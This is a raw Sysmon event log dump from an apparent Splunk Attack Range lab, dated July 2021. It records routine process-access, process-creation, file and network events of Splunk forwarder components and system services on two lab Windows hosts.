07:52:26.178{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807593Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.178{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807592Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.163{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807591Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.163{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807590Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.163{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807589Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.163{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807588Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.163{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807587Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.163{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807586Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.163{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F4BA-60EB-7679-00000000D001}1504C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807585Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.163{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4BA-60EB-7679-00000000D001}1504C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807584Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.163{0C1E0330-F4BA-60EB-7679-00000000D001}1504C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000807628Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.233{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57267-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807627Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.835{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3AFE28E4981ECCFAB1A26CE648ADCB45,SHA256=ACD6F36E843A374A44D3038393BA6A22101A7836A517DE8DDF20B37056082B52,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807626Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.538{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4BB-60EB-7879-00000000D001}3816C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807625Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.538{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807624Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.538{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807623Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.538{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807622Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.538{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807621Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.538{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807620Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.538{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807619Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.538{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807618Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.538{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807617Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.538{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807616Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.538{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F4BB-60EB-7879-00000000D001}3816C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807615Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.538{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4BB-60EB-7879-00000000D001}3816C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807614Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.523{0C1E0330-F4BB-60EB-7879-00000000D001}3816C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807613Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.522{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DABB6E03078A12B6136115210758F6D9,SHA256=2B5699FC61AA7D351DF7D813FEA417C61069A8373BC2FDDDDABED88D6B80CBD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048932Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:27.441{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBEEE652031D318A8E98FD64C2EDA4F0,SHA256=22D0C474E11F3C2E96D69D8191413162E444E33C1FB8DCAC04B118A6F94D77EA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048931Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:19.783{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 